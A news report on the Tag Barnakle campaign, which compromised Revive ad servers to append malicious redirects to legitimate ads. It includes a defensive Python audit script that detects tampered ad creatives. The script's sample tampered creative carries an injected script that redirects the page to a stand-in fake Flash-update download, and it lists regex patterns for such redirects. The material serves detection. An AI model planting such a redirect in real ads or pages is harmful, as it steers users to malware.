Posted on April 23, 2020 at 12:40 PM
Reports reveal that a hacking group has been inserting malicious ads into ad servers for the past nine months. The malicious ads indirectly send users to malware sites where their systems are infected.
Confiant, a cybersecurity firm, discovered the ad server hacking campaign last month, although the malware campaign has been running since August last year.
How the hackers operate using malicious ads
Confiant reported that the cybercriminals infiltrated advertising servers running outdated versions of the Revive open source ad server. Once inside, the hackers quietly appended malicious code to ads that were already running. As a result, a user clicking one of these ads would think they were clicking a genuine, safe ad, only to be redirected to a malware server without noticing.
Once the hackers have loaded their tampered ads on legitimate sites, the appended code redirects visitors to sites that serve malware-laced files. Users may not easily realize that the files are malicious because they are disguised as Adobe Flash Player updates.
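The check a publisher or ad-ops team would want after reading the above is whether the creatives their ad server is currently returning still match what was approved, and, if not, whether the appended portion contains a redirect. The following is an added example (not code from Confiant, Revive or the original article): it compares each served creative against its approved baseline and scans any appended bytes for top-level navigation patterns. The creative markup, the `update-flash.example` lure URL and the ad IDs are constructed for illustration; the page does not reproduce the actual Tag Barnakle payload.

```python
import hashlib
import re

# Constructed sample: an approved ad creative as originally stored, and the
# same creative after an attacker appended a redirect script to its end
# (illustrative only; not the real campaign payload).
ORIGINAL_CREATIVE = (
    '<a href="https://ads.example/click?id=42">'
    '<img src="https://ads.example/banner42.png" width="300" height="250"></a>'
)
TAMPERED_CREATIVE = ORIGINAL_CREATIVE + (
    '<script>setTimeout(function(){'
    'window.top.location.href="https://update-flash.example/player.exe";},1500);'
    '</script>'
)

# Patterns a redirecting injection inside an ad frame typically needs:
# navigating the top-level window, or writing a second script tag.
REDIRECT_PATTERNS = [
    re.compile(r"(window\.)?top\.location(\.href)?\s*=", re.I),
    re.compile(r"location\.(replace|assign)\s*\(", re.I),
    re.compile(r"document\.write\s*\(\s*['\"]\s*<script", re.I),
]


def creative_hash(html):
    """SHA-256 of the creative markup, used as the approval fingerprint."""
    return hashlib.sha256(html.encode("utf-8")).hexdigest()


def find_redirects(html):
    """Return the regex patterns (as strings) that match in the given markup."""
    return [p.pattern for p in REDIRECT_PATTERNS if p.search(html)]


def audit(baseline, served):
    """Compare served creatives with their approved baseline.

    baseline: {creative_id: approved_html} as signed off by the publisher.
    served:   {creative_id: html} as currently returned by the ad server.
    Returns {creative_id: verdict}. A verdict is 'unchanged', 'missing', or
    'modified' with the appended suffix (when the approved markup is a prefix
    of the served copy) and any redirect patterns found in it.
    """
    report = {}
    for cid, approved in baseline.items():
        live = served.get(cid)
        if live is None:
            report[cid] = {"status": "missing"}
            continue
        if creative_hash(live) == creative_hash(approved):
            report[cid] = {"status": "unchanged"}
            continue
        # Appended code is the common case described in the article; if the
        # creative was altered elsewhere, scan the whole served markup instead.
        appended = live[len(approved):] if live.startswith(approved) else None
        report[cid] = {
            "status": "modified",
            "appended": appended,
            "redirects": find_redirects(appended if appended is not None else live),
        }
    return report


if __name__ == "__main__":
    # Constructed run: creative 42 was tampered with, 43 was left alone.
    result = audit(
        {"42": ORIGINAL_CREATIVE, "43": ORIGINAL_CREATIVE},
        {"42": TAMPERED_CREATIVE, "43": ORIGINAL_CREATIVE},
    )
    for cid, verdict in result.items():
        print(cid, verdict)
```

In practice the baseline would come from the publisher's own approval records rather than from the ad server, since a compromised server can rewrite both the creative and any hash it stores alongside it. Real-time bidding creatives that arrive from other exchanges have no local baseline, so for those the pattern scan on the whole markup is the only part of this check that applies.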
Confiant revealed that it has found about 60 Revive ad servers that have been compromised and used to serve the malicious ads.
The cybersecurity firm said the hacking group, which it calls Tag Barnakle, has succeeded in injecting its malicious code into several thousand ads. The reach of the malicious ads has also been amplified by real-time bidding (RTB) integrations between ad services, which pass the tampered creatives on to other networks.
According to Confiant's Senior Security Engineer, Eliya Stein, a single compromised RTB ad server can push the number of affected ad impressions to 1.25 million in a day.
“If we take a look at the volumes behind just one of the compromised RTB ad servers – we see spikes of up to 1.25 [million] affected ad impressions in a single day,” he said.
Stein further pointed out that Tag Barnakle is not a typical malvertiser. Groups using malvertising to compromise systems have not operated on this level for a long time; the last time a group was this sophisticated was in 2016.
Malvertiser groups are taking an entirely different approach
For the past few years, most malvertising syndicates have used the same operational strategy: setting up networks of phony companies that purchase ad slots on genuine sites. After the ads they bought are approved, they swap in malicious code.
This old strategy has been the standard way hackers abuse ads for their operations. Some shady ad networks can even afford to overlook the activities of the malvertisers buying ads on their network, since both parties profit from the deal.
The new strategy instead takes over the ad company's servers outright and uses them to distribute malware through a malicious ad campaign.
Stein said this method is rare and not the easiest way for a malvertiser to get its code in front of users. But it is the most effective, because the attacker gains full control over the ad channel while still appearing to be a legitimate ad server. The downside for the attacker is legal: compromising an ad server is a crime, whereas buying an ad slot is not.
The new method also requires a different skill set, because not every malvertiser has the ability to attack an ad serving system. Most therefore choose to pay for an ad slot, which is far easier than breaking into an ad server.
Attacks still going on
Stein and Confiant have been notifying the affected ad companies about the ongoing ad server compromises. But some of the operators have not responded by securing their servers, so the hacking group is still active on their infrastructure.
According to Stein, despite his notifications, some ad servers remain compromised, which allows the attackers to continue their campaign.